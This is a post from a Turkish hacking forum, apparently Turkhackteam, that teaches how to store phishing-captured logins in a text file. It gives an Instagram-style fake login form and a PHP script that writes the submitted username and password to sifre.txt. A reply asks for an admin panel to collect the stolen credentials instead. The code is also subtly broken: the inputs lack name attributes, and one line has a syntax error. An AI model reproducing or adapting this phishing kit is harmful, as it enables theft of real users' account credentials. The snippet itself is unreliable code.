PHP'de txt dosyasına veri ekleme

CyberOx

Üye
8 Ara 2018
90
1
Öncelikle Merhaba Dostlar Kısaca Forumda Bir arkadaşımın Rastlamış olduğunu sorunun çözümünü anlatacağım o zaman direk olarak Konumuza geçelim.

Dostumuz Phishing işlemini mysql'siz bir şekilde txt dosyasına kaydetmek istiyor nasıl yapacağını kısaca burda anlatacağım.

İlk olarak TXT dosyasını oluşturun (ex: sifre.txt)

daha sonra php komutumuz.

fopen() komutu ile txt'i açıyorum.

$sifre_kayit = fopen("sifre.txt","w");

Burda Kısaca Ne Yaptığımı anlatayım Sifre Metin belgesini yazılabilir şekilde açmasını sağlıyoruz.

daha sonra açma işlemi başarılı olmassa bize hata verdirsin ki bilgiler boşa gitmesin.
Kod:
if(!$sifre_kayit) {

echo "Hata var"; 
}

Hata varsa bize bu şekilde bildiricek şimdi konumuza devam edelim ben instagram üzerinden örnek vericem siz kendinize göre düzenleyebilirsiniz

Şimdi Örnek form ekranımız

Kod:
<form method="post" action="giris_sorgu.php">
    <table border="1">
        <tr>
            <td>Kullanıcı Adı</td>
            <td><input type="text" id="kadi" /></td>
        </tr>
        <tr>
            <td>Şifre</td>
            <td><input type="text" id="sifre" /></td>
        </tr>
        <tr>
            <td colspan="2"><input type="submit" value="Giriş" /></td>
        </tr>
    </table>
</form>

daha sonra Giris Sorgu Dosyamızı oluşturalım

Kod:
<?php

$sifre_kayit = fopen("sifre.txt","r+");

if(!$sifre_kayit)
{
    echo "Hata !";
}

$kadi = $_POST["kadi"];
$sifre = $_POST["sifre"];

$bilgi = $kadi . ";" . sifre .;

echo $bilgi;
fwrite($sifre_kayit,$bilgi);
?>

Bilgileri Sifre.txt ye kaydedecektir İşlem Bu kadar Umarım İşinize Yarar. Bi teşekkürü Çok görmeyelim :}

Moderatör tarafında düzenlendi:

Flurry

Yeni üye
13 Ocak 2019
38
0
Evden.
Saol ama ben txt demiyorum admin paneli diyorum :) Yani siteörnek/admin.php sonra kullanıcı adı şifre oda ya sql a yada panele düşmesini istiyorum.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.